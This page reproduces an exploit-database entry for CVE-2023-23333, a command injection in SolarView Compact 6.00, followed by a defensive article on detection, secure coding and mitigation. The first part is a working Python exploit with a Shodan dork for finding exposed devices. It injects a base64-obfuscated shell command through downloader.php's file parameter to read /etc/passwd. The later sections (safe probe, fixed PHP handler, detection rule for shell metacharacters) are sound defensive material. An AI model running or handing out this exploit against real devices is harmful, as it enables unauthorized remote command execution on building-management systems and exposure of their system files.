SolarView Compact 6.00 - Command Injection

Exploit Author: ByteHunter Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2024-03-14 
#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333


import argparse
import requests

def vuln_check(ip_address, port):
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
    response = requests.get(url)
    if response.status_code == 200:
        output = response.text
        if "root" in output:
            print("Vulnerability detected: Command Injection possible.")
            print(f"passwd file content:\n{response.text}")


        else:
            print("No vulnerability detected.")
    else:
        print("Error: Unable to fetch response.")

def main():
    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
    parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
    args = parser.parse_args()
    
    ip_address = args.ip
    port = args.port
    vuln_check(ip_address, port)

if __name__ == "__main__":
    main()


SolarView Compact 6.00 — Command Injection (CVE-2023-23333): Overview, Detection, and Mitigation

SolarView Compact is a web-enabled device used in building management / environmental control. A critical vulnerability tracked as CVE-2023-23333 affects version 6.00: a command injection in a file download handler (commonly referenced as downloader.php). This article explains the root cause at a conceptual level, safe detection techniques, secure coding fixes, mitigation best practices, and incident response guidance for operators and defenders.

Vulnerability summary

  • Type: Command injection / Remote Code Execution (RCE)
  • Affected versions: SolarView Compact 6.00 (reported)
  • CVE: CVE-2023-23333
  • Impact: An attacker able to reach the vulnerable web endpoint can execute arbitrary shell commands as the web service user. This can lead to credential theft, device takeover, lateral movement, and persistent compromise.
  • Root cause (conceptual): User-controlled input is incorporated into a shell-invoking function (e.g., system(), exec(), shell pipeline) without proper validation or escaping, allowing injection of additional shell commands or operators.

How the vulnerability works (high level)

Many file download or management scripts accept a filename parameter and then run system utilities or shell pipelines to process or package the requested file. If user input is concatenated into a shell command string, special shell characters (such as ; | & ` $() or >) can be injected to run new commands. The vulnerability is not the concept of downloading a file itself, but the lack of input validation and the use of a shell-based execution path.

Safe detection — non-invasive checks

When validating deployments in your environment, use non-destructive checks that do not attempt command execution. The following Python example shows a safe scanner that queries the endpoint, looks for indicative page content, and tries to detect the product/version without sending exploit payloads.

import requests
from urllib.parse import urljoin

def safe_probe(base_url, timeout=5):
    # Query the downloader endpoint with a harmless filename
    url = urljoin(base_url, "/downloader.php")
    params = {"file": "README.txt"}  # harmless, no shell metacharacters
    try:
        r = requests.get(url, params=params, timeout=timeout, allow_redirects=True)
    except requests.RequestException as e:
        return {"reachable": False, "error": str(e)}

    info = {"reachable": True, "status_code": r.status_code}

    # Look for product name/version strings in body or headers
    body = r.text.lower()
    if "solarview" in body or "compact" in body:
        info["product_like"] = True
    # Check for server headers that might include firmware or device labels
    if "server" in r.headers:
        info["server_header"] = r.headers.get("server")
    return info

# Example usage:
# print(safe_probe("http://192.0.2.10:80"))

Explanation: This script performs a simple, non-invasive HTTP query to the downloader endpoint with a safe filename. It does not attempt to inject shell characters or execute remote commands. The script records whether the endpoint is reachable, the HTTP status, and whether common product strings appear in the response to help identify potentially vulnerable devices.

Secure coding: how to fix vulnerable download handlers

Fixes must remove any reliance on the shell for processing untrusted input and must strictly validate/allowlist inputs. Below is a defensive PHP pattern that demonstrates properly validating a requested filename, forbidding path traversal, and serving files directly from a controlled directory without invoking a shell.

<?php
// Example: secure file download handler (illustrative)
$allowed_dir = __DIR__ . '/downloads/';

// Accept only a filename (no path separators)
$filename = isset($_GET['file']) ? basename($_GET['file']) : '';

if ($filename === '') {
    http_response_code(400);
    echo "Bad request";
    exit;
}

// Enforce allowlist of extensions (adjust per your policy)
$allowed_ext = ['txt', 'pdf', 'cfg', 'zip'];
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed_ext, true)) {
    http_response_code(403);
    echo "Forbidden file type";
    exit;
}

// Build a canonical path and ensure it is inside allowed_dir
$fullpath = realpath($allowed_dir . $filename);
if ($fullpath === false || strpos($fullpath, realpath($allowed_dir)) !== 0) {
    http_response_code(403);
    echo "Access denied";
    exit;
}

// Serve the file using PHP I/O functions (no shell)
if (!is_readable($fullpath) || !is_file($fullpath)) {
    http_response_code(404);
    echo "Not found";
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'. basename($fullpath) .'"');
readfile($fullpath);
exit;
?>

Explanation: This code avoids all shell calls. It uses basename() to strip directory components from user input, validates the file extension against an allowlist, uses realpath() to confirm the resolved path is inside the permitted directory, and serves the file with readfile(). This pattern greatly reduces the risk of command injection and path traversal.

Additional secure development recommendations

  • Never construct shell commands with user input. If you must run external programs, use language-specific APIs that take argument arrays rather than a single shell string (e.g., execve / proc_open with escapeshellarg only as a last resort).
  • Use strict allowlists for filenames and file extensions.
  • Run web services with the least privilege required and isolate sensitive files from the webroot.
  • Enable and monitor application logs; instrument requests to high-risk endpoints.

Mitigation and operational hardening

  • Apply vendor patches: the most reliable remediation is to upgrade the device firmware to the vendor-supplied patched version for SolarView Compact.
  • If a patch is not immediately available, restrict access to the device management interface to trusted networks (e.g., management VLAN) and block inbound access from the public Internet.
  • Deploy host-based or network-based controls: WAF/IPS rules that sanitize or block suspicious parameter patterns (unusual punctuation in parameters, command-operator characters) can reduce exposure. Ensure rules are tuned to avoid false positives.
  • Change default management credentials and enforce strong authentication for device access. Where possible, use multifactor authentication and certificate-based access for management interfaces.
  • Disable or remove unnecessary web functionality (e.g., downloader endpoints) if not required by your environment.
  • Monitor for indicators of compromise such as unexpected file creations, new local accounts, or outbound connections to suspicious destinations.

Incident response guidance

If you suspect exploitation:

  • Isolate the device from the network to prevent further lateral movement.
  • Collect forensic artifacts: web server access and error logs, system logs, running processes, and scheduled tasks. Preserve these artifacts for analysis.
  • Look for anomalous HTTP requests to downloader.php or similar endpoints, especially parameters containing shell metacharacters or encoded payloads.
  • Reset credentials and rotate any keys or secrets that might have been exposed. Re-image the device if compromise is confirmed and a clean firmware image is available.
  • Report incidents to the vendor and follow their guidance for remediation and evidence collection.

Detection rule example (concept)

As a conceptual example, defenders can create rules to flag requests to file-serving endpoints containing potentially dangerous characters in filename parameters. Below is a high-level description (do not copy verbatim to production without testing):

  • Trigger when the request target is /downloader.php (or similar) AND the value of the "file" parameter contains characters such as ; | & ` $ (or percent-encoded equivalents).
  • Log the full request, source IP, and timestamp for investigation and optionally block the request.

Summary table

ItemDetail
VulnerabilityCommand injection in file download handler
CVECVE-2023-23333
AffectedSolarView Compact 6.00
Primary mitigationApply vendor patch / firmware update; restrict access

Responsible disclosure & references

If you are a vendor or operator: coordinate disclosure with the device vendor and follow the vendor’s remediation advisories. For defenders and incident responders, prioritize patching and network isolation of vulnerable devices.

References (for defenders): vendor advisories, CVE-2023-23333 summaries, and secure coding guidance on avoiding command injection flaws.